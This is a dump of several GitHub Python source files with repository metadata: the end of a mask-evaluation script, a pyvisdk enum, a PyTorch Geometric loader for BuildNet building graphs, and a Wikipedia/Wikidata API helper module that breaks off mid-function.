            # img_poly_true is kept for optional polygon plotting/debugging.
            img_poly_true = images_metadata_polygons[img_id]
            img_mask_true = images_masks_stacked[img_id]
        else:
            img_poly_true = None
            img_mask_true = None

        # Morphological clean-up of the raw predicted mask.
        img_mask_pred_simplified = simplify_mask(img_mask_pred, kernel_size=5)

        if kind == 'train':
            jaccard = jaccard_coef(img_mask_pred, img_mask_true)
            jaccards.append(jaccard)
            jaccard_simplified = jaccard_coef(img_mask_pred_simplified, img_mask_true)
            jaccards_simplified.append(jaccard_simplified)
            logging.info('Image: %s, jaccard: %s, jaccard simplified: %s', img_id, jaccard, jaccard_simplified)

    if kind == 'train':
        logging.info('Mean jaccard: %s, Mean jaccard simplified: %s', np.mean(jaccards), np.mean(jaccards_simplified))

    # Imported lazily so headless evaluation doesn't require a display backend.
    import matplotlib.pyplot as plt
    plt.show()
if __name__ == '__main__':
    # Script entry point: evaluate the training split.
    main('train')
| [
"jgc128@outlook.com"
] | jgc128@outlook.com |
223e90ab575e13cd7f3190006ae7286362be3c1c | 8da91c26d423bacbeee1163ac7e969904c7e4338 | /pyvisdk/enums/filter_spec_logical_operator.py | 0d78d493fcfffe5fdfb4c421cfc64e4c3a57bc66 | [] | no_license | pexip/os-python-infi-pyvisdk | 5d8f3a3858cdd61fb76485574e74ae525cdc7e25 | 1aadea0afbc306d09f6ecb9af0e683dbbf961d20 | refs/heads/master | 2023-08-28T02:40:28.789786 | 2020-07-16T04:00:53 | 2020-07-16T04:00:53 | 10,032,240 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
########################################
# Automatically generated, do not edit.
########################################
from pyvisdk.thirdparty import Enum
# Logical operators available when combining criteria in a vSphere
# property-collector FilterSpec (auto-generated enum — do not edit).
FilterSpecLogicalOperator = Enum(
    'logicalAnd',
    'logicalOr',
)
| [
"jmb@pexip.com"
] | jmb@pexip.com |
2502f33983700130044447aab3dee9dd8f4027a0 | ae7aa9a720738ca15c3c8d676d840c175b9a35f2 | /GNN/Dataset/buildnet_dataset.py | 3255d673869a94cc04f874484460ee74cdb24cae | [] | no_license | jhzhang2077/buildingnet_dataset | b96693fba45983d92db7c4897e220537b5c627b2 | 45d8cae3c117087eb5d4e55b8b72e0cb395fee21 | refs/heads/main | 2023-08-23T09:22:29.662312 | 2021-10-13T19:12:34 | 2021-10-13T19:12:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,031 | py | import os
import torch
import json
import numpy as np
import GNN.utils.util as util
from torch_geometric.data import Data, InMemoryDataset
from itertools import product
#from torch_geometric.utils import add_self_loops
class BuildnetDataSet(InMemoryDataset):
    def __init__(self, root, typeofdata, typeofedge, nodefeature=None, pretrainedtype=None):
        # typeofdata: dataset split name; '<typeofdata>.txt' under root lists
        # the building model ids that belong to this split.
        self.typeofdata = typeofdata
        # typeofedge: which edge definition json to use ('<id>_<typeofedge>.json').
        self.typeofedge = typeofedge
        # nodefeature: per-node feature combination assembled in process()
        # (e.g. 'node', 'minkow', 'node+pointnet', ...).
        self.nodefeature = nodefeature
        # pretrainedtype: sub-directory of the pretrained feature dumps to load.
        self.pretrainedtype = pretrainedtype
        self.file_list = []
        # NOTE(review): the three path lists below are only populated by code
        # that is commented out in raw_file_names — presumably dead state.
        self.edge_file_paths = []
        self.node_file_paths = []
        self.label_file_paths = []
        super(BuildnetDataSet, self).__init__(root)
        # InMemoryDataset.__init__ runs process() when the processed file is
        # missing; afterwards the collated tensors are loaded from disk.
        self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
raw_file = open(os.path.join(self.root, self.typeofdata+".txt"),"r")
self.file_list = []
for line in raw_file:
line = line.strip()
self.file_list.append(line)
#self.edge_file_paths.append(os.path.join(self.root, self.typeofedge, line+'_'+self.typeofedge+'.json'))
#self.label_file_paths.append(os.path.join(self.root, "label", line+'_GNNlabel.txt'))
#self.node_file_paths.append(os.path.join(self.root, "node", line+'_node.json'))
raw_file.close()
return self.file_list
    @property
    def processed_file_names(self):
        # Single collated file whose name encodes every configuration knob so
        # different (split, edge, feature, pretrained) combos don't collide.
        # NOTE(review): this property is also queried before processing, so the
        # print below fires on every access — consider logging.debug instead.
        print("already processed")
        return [self.typeofdata+'_'+self.typeofedge+'_'+self.nodefeature+'_'+self.pretrainedtype+'_data.pt']
#def __len__(self):
# return len(self.raw_paths)
    def download(self):
        # Nothing to download: raw files are expected to already be on disk.
        pass
def process(self):
data_list = []
path = None
name = None
x_list = []
findex = [i for i in range(len(self.file_list))]
for index in range(len(self.file_list)):
fname = self.file_list[index]
print(fname)
label_json = json.load(open(os.path.join(self.root, "label",fname+'_label.json'),"r"))
nodefeature = []
numnodes = 0
if self.nodefeature == 'minkow':
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_minkow_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
numnodes = len(pointnet_torch)
for i in range(numnodes):
nodefeature.append(pointnet_torch[i].float())
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+minkow":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_minkow_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+minkownormal":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_minkownormal_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+dgcnn":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_dgcnn_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == 'pointnet':
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_pointnet_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
numnodes = len(pointnet_torch)
for i in range(numnodes):
nodefeature.append(pointnet_torch[i].float())
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+pointnet":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_pointnet_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == "node+pointnetnormal":
#pointnet_torch = torch.load(os.path.join(self.root, "pretrained_pointnet_acc_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
pointnet_torch = torch.load(os.path.join(self.root, "pretrained_avgpool_pointnetnormal_features",self.pretrainedtype,fname+'.pth.tar'), map_location='cpu')
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
feature = torch.cat((torch.tensor(node_json[str(i)]), pointnet_torch[i].float()))
nodefeature.append(feature)
nodefeature = torch.stack(nodefeature)
elif self.nodefeature == 'node':
node_json = json.load(open(os.path.join(self.root, "node", fname+'_node.json'),"r"))
numnodes = len(node_json)
for i in range(numnodes):
nodefeature.append(node_json[str(i)])
nodefeature = np.array(nodefeature)
nodefeature = torch.from_numpy(np.array(nodefeature))
label = []
for i in range(numnodes):
label.append(label_json[str(i)])
y = torch.Tensor(np.array(label))
if self.typeofedge == 'node':
numnodes = torch.tensor([float(numnodes)])
fileindex = torch.tensor([float(findex[index])])
data_list.append(Data(x=nodefeature, fileindex=fileindex, numnodes=numnodes , y=y))
else:
nodepair = []
attribute = []
nodepair_dict = {}
if self.typeofedge != 'all':
# Undirected edge / Directed edges
nodesvisited = set()
if self.typeofedge == 'adjacency+similarity':
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
# 4 adjacency, 1 similarity
nodepair_dict = {x:{y:[0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = [values]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'adjacency+support':
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
# 4 adjacency, 4 support
nodepair_dict = {x:{y:[0,0,0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = values
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'adjacency+containment':
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
# 4 adjacency, 2 containment,
nodepair_dict = {x:{y:[0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = values
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'support+similarity':
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
# 4 support, 1 similarity
nodepair_dict = {x:{y:[0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = [values]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'containment+similarity':
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
# 2 containment, 1 similarity
nodepair_dict = {x:{y:[0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:2] = values
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][2:] = [values]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'support+containment':
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
# 4 support, 1 containment
nodepair_dict = {x:{y:[0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:] = values
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'similarity':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(2))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if values != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate(([edge_json[node1][node2]],[edge_json[node2][node1]])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'containment':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(4))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((edge_json[node1][node2],edge_json[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'adjacency':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(8))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if (sum(values[3:]) != 0):
nodepair.append([int(node1), int(node2)])
if (node2 in edge_json and node1 in edge_json[node2]):
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node2][node1][3:])))
else:
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node1][node2][3:])))
elif self.typeofedge == 'support':
edge_json = json.load(open(os.path.join(self.root, self.typeofedge, fname+'_'+self.typeofedge+'.json'),'r'))
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(8))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in edge_json.items():
for node2, values in node1_neigh.items():
if (node1,node2) in nodesvisited:
continue
if (sum(values[3:]) != 0):
nodepair.append([int(node1), int(node2)])
if (node2 in edge_json and node1 in edge_json[node2]):
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node2][node1][3:])))
else:
attribute.append(np.concatenate((edge_json[node1][node2][3:], edge_json[node1][node2][3:])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
elif self.typeofedge == 'all':
# Undirected edge / Directed edges
containmentedge_json = json.load(open(os.path.join(self.root, 'containment', fname+'_containment.json')))
adjacencyedge_json = json.load(open(os.path.join(self.root, 'adjacency', fname+'_adjacency.json')))
similarityedge_json = json.load(open(os.path.join(self.root, 'similarity', fname+'_similarity.json')))
supportedge_json = json.load(open(os.path.join(self.root, 'support', fname+'_support.json')))
# 4 adjacency, 1 similarity, 2 containment, 4 support
nodepair_dict = {x:{y:[0,0,0,0,0,0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
# 1 adjacency, 1 similarity, 2 containment, 4 support
#nodepair_dict = {x:{y:[0,0,0,0,0,0,0,0] for y in range(numnodes)} for x in range(numnodes)}
node_pair_set = set()
nodesvisited = set()
for i in range(numnodes):
nodepair.append([int(i), int(i)])
attribute.append(np.ones(22))
nodesvisited.add((str(i),str(i)))
for node1,node1_neigh in adjacencyedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][0:4] = values[3:]
for node1,node1_neigh in similarityedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][4:5] = [values]
for node1,node1_neigh in containmentedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][5:7] = values
for node1,node1_neigh in supportedge_json.items():
for node2, values in node1_neigh.items():
nodepair_dict[int(node1)][int(node2)][7:] = values[3:]
for node1, node1neigh in nodepair_dict.items():
for node2, values in node1neigh.items():
if (node1,node2) in nodesvisited:
continue
if sum(values) != 0 or sum(nodepair_dict[node2][node1]) != 0:
nodepair.append([int(node1), int(node2)])
attribute.append(np.concatenate((nodepair_dict[node1][node2], nodepair_dict[node2][node1])))
nodesvisited.add((node1,node2))
nodesvisited.add((node2,node1))
nodepair = np.array(nodepair)
#edgeadjacencymatrix = util.getEdgeAdjacencyMatrix(numnodes,nodepair)
#edgeadjacencymatrix = np.reshape(edgeadjacencymatrix.flatten(),(-1,1))
#edgeadjacencymatrix = torch.from_numpy(edgeadjacencymatrix)
#adjacencymatrix = util.getAdjacencyMatrix(nodefeature.shape[0],nodepair)
#adjacencymatrix = np.reshape(np.array(adjacencymatrix.toarray()).flatten(), (-1,1))
#adjacencymatrix = torch.from_numpy(adjacencymatrix)
nodepair = torch.Tensor(nodepair)#, dtype=torch.long)
attribute = torch.Tensor(np.array(attribute))#, dtype=torch.float)
numnodes = torch.tensor([float(numnodes)])
numedges = torch.tensor([float(len(nodepair))])
fileindex = torch.tensor([float(findex[index])])
#data_list.append(Data(fileindex=fileindex, x=nodefeature , nodepair=nodepair, attribute=attribute, adjacencymatrix=adjacencymatrix, numnodes=numnodes, y=y))
data_list.append(Data( x=nodefeature , nodepair=nodepair, attribute=attribute, numedges=numedges , numnodes=numnodes, fileindex=fileindex, y=y))
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
# toremove = []
# for node1, node1neigh in nodepair_dict.items():
# for node2, values in node1neigh.items():
# if sum(values) <= 0:
# toremove.append([node1,node2])
#
# for items in toremove:
# del nodepair_dict[items[0]][items[1]]
#
# nodepair_values = {node1: node2 for node1,node2 in nodepair_dict.items() if node2}
| [
"pselvaraju@umass.edu"
] | pselvaraju@umass.edu |
e9a9824fb106bf2e8694b80bc0b009312ea0855d | 9392e0b7d08ba3c3d3021dc79f4efba964330fb6 | /all_functions.py | 597adb53bf2fa8cd344ffa91421f494217fb49dd | [] | no_license | mapzen-data/wikipedia-notebooks | 10bd611602c11d95b0400c408af6d2c7697aa134 | 308a9c63c446ee6e61e6784957717a3d6e1a9d57 | refs/heads/master | 2020-12-25T14:39:05.202357 | 2016-08-03T22:42:39 | 2016-08-03T22:42:39 | 61,059,553 | 9 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,914 | py | import csv
import pandas as pd
import requests
import json
import numpy as np
import io
import time
def read_data(path):
    """Load a comma-separated file with a header row into a DataFrame."""
    return pd.read_csv(path, header=0, sep=',')
def split_into_groups(data):
    """Partition rows by which of the 'wk:page' / 'wd:id' columns are filled.

    Returns four frames in this order: neither column filled, only 'wd:id',
    only 'wk:page', and both filled.
    """
    has_page = data['wk:page'].notnull()
    has_id = data['wd:id'].notnull()
    no_data = data[~has_page & ~has_id]
    only_wd = data[~has_page & has_id]
    only_wp = data[has_page & ~has_id]
    both_wd_wp = data[has_page & has_id]
    return no_data, only_wd, only_wp, both_wd_wp
def finditem(obj, key):
    """Depth-first search a nested dict for *key*; return its value or None."""
    if key in obj:
        return obj[key]
    for value in obj.values():
        if isinstance(value, dict):
            found = finditem(value, key)
            if found is not None:
                return found
    return None
def isNaN(num):
    """True when *num* is NaN — the only value that does not equal itself."""
    return not (num == num)
def get_id(row):
    """Return the Wikidata identifier stored in the row's 'wd:id' field."""
    return row['wd:id']
def get_page_name(row):
    """Return the Wikipedia page name stored in the row's 'wk:page' field."""
    return row['wk:page']
def parse_name_from_url(url):
    """Return the final path segment of *url* (e.g. the article name).

    Uses index -1 instead of the original's [1] so a bare name with no
    slash is returned as-is rather than raising IndexError.
    """
    return url.rsplit('/', 1)[-1]
def combine_ids_for_API(data):
    """Build the list of 'wd:id' values, each '|'-terminated except the last.

    Joined together, the pieces form the ids= argument of a wbgetentities
    call.  Removes the original's unused `only_wd_new` local and the
    indirection through the trivial `get_id` accessor.
    Note: resets *data*'s index in place, as the original did.
    """
    data.index = range(len(data))
    all_ids = []
    last = len(data) - 1
    for index, row in data.iterrows():
        wd_id = str(row['wd:id'])
        # every id but the last carries the API's '|' separator
        all_ids.append(wd_id + '|' if index != last else wd_id)
    return all_ids
def combine_page_names(data):
    """Collect every row's 'wk:page' value into a plain list.

    Resets the frame's index in place first, mirroring the original.
    """
    data.index = range(len(data))
    names = []
    for _, row in data.iterrows():
        names.append(row['wk:page'])
    return names
def combine_page_names_for_API(names):
    """Join *names* with '|' for a MediaWiki titles= parameter.

    Returns the joined string together with the untouched input list.
    """
    all_names_for_API = '|'.join(str(item) for item in names)
    return all_names_for_API, names
def find_duplicates(data, field):
    """Return every row whose non-null *field* value occurs more than once."""
    present = data[data[field].notnull()]
    repeated = present[present.duplicated(field)]
    repeated_values = np.asarray(repeated[field])
    return data.loc[data[field].isin(repeated_values)]
def find_unique(data, field):
    """Return rows with a non-null *field*, keeping only the first of each value."""
    present = data[data[field].notnull()]
    return present[~present.duplicated(field)]
def request_API_title(all_ids):
    """Fetch the enwiki sitelink titles for the given Wikidata id pieces.

    *all_ids* are the '|'-terminated fragments built by combine_ids_for_API;
    returns the parsed JSON payload of the wbgetentities call.
    """
    joined_ids = "".join(all_ids)
    url = "https://www.wikidata.org/w/api.php?action=wbgetentities&ids=%s&props=sitelinks/urls&sitefilter=enwiki&languages=en&format=json" % joined_ids
    response = requests.get(url)
    return json.loads(response.content)
def request_API_id_by_name(names_API, names):
    """Ask Wikipedia for the page props (incl. Wikidata ids) of the given titles.

    Returns (parsed_json, failed_names): on a JSON decode error the payload
    is the sentinel string 'null' and *names* is reported back as failed.
    """
    try:
        url = "https://en.wikipedia.org/w/api.php?action=query&prop=pageprops&titles=%s&format=json" % names_API
        data_request = json.loads(requests.get(url).content)
        names_failed = []
    except ValueError:
        data_request = 'null'
        names_failed = names
    return data_request, names_failed
def find_titles(data):
    """Turn a wbgetentities payload into a DataFrame of (wd:id, wiki_page).

    Returns an empty list (not a frame) when the payload is the 'null'
    sentinel or an API error; callers detect that via len().
    """
    if data == 'null':
        return []
    if 'error' in data.keys():
        return []
    collected = []
    for entity_id, entity in data['entities'].items():
        collected.append((entity_id, finditem(entity, 'title')))
    titles = pd.DataFrame(collected)
    titles.columns = ['wd:id', 'wiki_page']
    return titles
def find_page_id_urls(data):
    """Turn a query/pageprops payload into a frame of page id, title, Wikidata id.

    Returns the sentinel string "null" on a failed or error payload
    (callers compare against that value).
    """
    if data == 'null':
        return "null"
    if 'error' in data.keys():
        return "null"
    rows = []
    for page_id, page in data['query']['pages'].items():
        rows.append((page_id, finditem(page, 'title'), finditem(page, 'wikibase_item')))
    urls = pd.DataFrame(rows)
    urls.columns = ['wk_page_id', 'wk_name', 'wiki_id']
    return urls
def execute_title_in_table_from_ids(data):
    """Fetch enwiki titles for the 'wd:id' column of *data* and merge them in.

    On success returns (merged_frame, []); when the lookup yields nothing,
    returns ([], ids_sent) so the caller can retry those ids one by one.
    """
    ids_data = combine_ids_for_API(data)
    looked_up = find_titles(request_API_title(ids_data))
    if len(looked_up) == 0:
        return [], ids_data
    result = data.merge(looked_up, on='wd:id')
    result['wk:page'] = result['wiki_page']
    result = result.drop('wiki_page', 1)
    return result, []
def execute_ids_in_table_from_names(data):
    """Look up page/Wikidata ids for every 'wk:page' value in *data*.

    Returns (parsed_id_frame_or_sentinel, names_that_failed).
    """
    query_string, names = combine_page_names_for_API(combine_page_names(data))
    payload, names_that_failed = request_API_id_by_name(query_string, names)
    return find_page_id_urls(payload), names_that_failed
def execute_titles_from_ids_one_by_one(data, names_that_failed):
    """Retry the title lookup id-by-id for ids that failed in a batch call.

    *data* is unused but kept for signature compatibility.  Returns
    (frame_of_recovered_titles, ids_still_unresolved); the first element is
    an empty list when nothing could be resolved — the original crashed in
    pd.concat on that path.  Also drops the original's unused
    `wof_items_merge` local and its redundant second filtering pass.
    """
    recovered_frames = []
    ids_cant_find = []
    for ids_data in names_that_failed:
        all_names = find_titles(request_API_title(ids_data))
        if len(all_names) == 0:
            ids_cant_find.append(ids_data)
        else:
            recovered_frames.append(all_names)
    if recovered_frames:
        all_dataframes_only_wp_second = pd.concat(recovered_frames)
    else:
        # guard: pd.concat([]) raises ValueError when every retry failed
        all_dataframes_only_wp_second = []
    return all_dataframes_only_wp_second, ids_cant_find
def execute_ids_in_table_from_names_one_by_one(data, names_that_failed):
    """Retry the page-id lookup name-by-name for names that failed in batch.

    *data* is unused but kept for signature compatibility.  Returns
    (list_of_per_name_results, list_of_failed_name_lists).  Results may
    include the "null" sentinel string for names whose payload could not be
    parsed (len("null") != 0, so the filter keeps it — preserved from the
    original).  Drops the original's unused, misspelled
    `ll_dataframes_only_wp_second` local and folds the second filtering
    loop into a comprehension.
    """
    per_name_results = []
    names_cant_find = []
    for name in names_that_failed:
        payload, failed = request_API_id_by_name(name, name)
        per_name_results.append(find_page_id_urls(payload))
        if len(failed) > 0:
            names_cant_find.append(failed)
    all_dataframes_only_wp_second = [r for r in per_name_results if len(r) != 0]
    return all_dataframes_only_wp_second, names_cant_find
def run_API_find_titles_in_batch(data_with_ids, batch_size):
    """Run the title lookup over *data_with_ids* in slices of *batch_size* rows.

    Returns (per_batch_results, failed_ids); failed ids have their '|'
    separators stripped so they can be retried individually.
    """
    result = []
    ids_failed = []
    for start in range(0, len(data_with_ids), batch_size):
        batch = data_with_ids[start:start + batch_size]
        new_data, names_failed = execute_title_in_table_from_ids(batch)
        result.append(new_data)
        ids_failed.extend(item.replace("|", "") for item in names_failed)
    return result, ids_failed
def run_API_find_ids_in_batch(data_with_titles, batch_size):
    """Run the page-id lookup over *data_with_titles* in slices of *batch_size*.

    Returns (per_batch_results, all_failed_names).  The original
    accumulated failures into a list it never returned and handed back
    only the LAST batch's failures; failures are now collected across
    every batch (still a flat list of names, so callers are unaffected).
    """
    result = []
    names_failed = []
    for start in range(0, len(data_with_titles), batch_size):
        batch = data_with_titles[start:start + batch_size]
        new_data, names_that_failed = execute_ids_in_table_from_names(batch)
        result.append(new_data)
        names_failed.extend(names_that_failed)
        # throttle between batches to stay polite to the API
        time.sleep(10)
    return result, names_failed
def combine_dataframes_from_batch(batch_result, names_failed):
    """Concatenate per-batch DataFrames and collect the failed names.

    Non-empty entries of *batch_result* are concatenated; empty entries
    contribute *names_failed* instead.  An empty *batch_result* is passed
    straight through.  The original crashed in pd.concat when every entry
    was empty; that path now returns an empty list.

    NOTE(review): *names_failed* is re-added once per empty batch entry,
    exactly as in the original — confirm whether that duplication is
    intended.
    """
    if len(batch_result) == 0:
        return batch_result, names_failed
    frames = []
    dataframe_failed = []
    for entry in batch_result:
